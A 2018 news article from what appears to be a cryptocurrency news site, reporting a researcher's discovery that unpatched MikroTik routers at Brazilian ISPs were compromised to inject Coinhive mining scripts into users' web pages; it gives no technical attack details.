ISPs were patient zero in a mass cryptojacking wave hitting Brazil

Posted: 7 August 2018 4:17 am

That’s why you keep your software up to date.

Cryptojacking is when an attacker infects a victim’s computer with a cryptocurrency miner, and then leeches their computing power for profit. Cryptojackers quickly became the most popular type of malware by a very large margin, often striking victims through creative attack vectors where traditional malware would probably have failed.

It looks like someone recently found another brand new attack vector, targeting carrier-grade MikroTik routers used by ISPs through an old vulnerability, and from there infecting about 200,000 Internet connections across Brazil and elsewhere.

The infection was discovered by Simon Kenin of Trustwave SpiderLabs on 31 July, when he picked up an unusual surge of cryptojacking activity in Brazil. He quickly ruled out a coincidence by noticing that all the infections were MikroTik network devices, and that all of the mining returns were going to the same entity.

By following tales of frustrated users, Kenin concluded that the Internet service providers themselves had their MikroTik routers compromised to mine cryptocurrency through their customers’ computers.

The exploit itself was patched almost immediately after discovery on 23 April, but not all MikroTik users actually bothered to install the update.

By getting in through slacking ISPs, the attacker could hit all their customers, netting some 200,000 devices in short order. These devices would then inject the Coinhive mining script into web pages visited by the user.

To make matters worse for the victims, and better for the attacker, the attack also hit websites behind infected routers. So business servers using unpatched MikroTik routers and hosting websites would also cryptojack visitors to the site, regardless of where they were visiting from.

“Let me emphasise how bad this attack is,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices. There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, each device serves at least tens if not hundreds of users daily.

“Allegedly, each user would have initially gotten the CoinHive script regardless which site they visited. Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”

Disclosure: At the time of writing, the author holds ETH, IOTA, ICX, VET, XLM, BTC and ADA.

Disclaimer: This information should not be interpreted as an endorsement of cryptocurrency or any specific provider, service or offering. It is not a recommendation to trade. Cryptocurrencies are speculative, complex and involve significant risks – they are highly volatile and sensitive to secondary activity. Performance is unpredictable and past performance is no guarantee of future performance. Consider your own circumstances, and obtain your own advice, before relying on this information. You should also verify the nature of any product or service (including its legal status and relevant regulatory requirements) and consult the relevant Regulators' websites before making any decision. Finder, or the author, may have holdings in the cryptocurrencies discussed.

Latest cryptocurrency news

Picture: Shutterstock

Ask an Expert provides guides and information on a range of products and services. Because our content is not financial advice, we suggest talking with a professional before you make any decision.

By submitting your comment or question, you agree to our Privacy and Cookies Policy and Terms of Use.

Questions and responses on are not provided, paid for or otherwise endorsed by any bank or brand. These banks and brands are not responsible for ensuring that comments are answered or accurate.
Go to site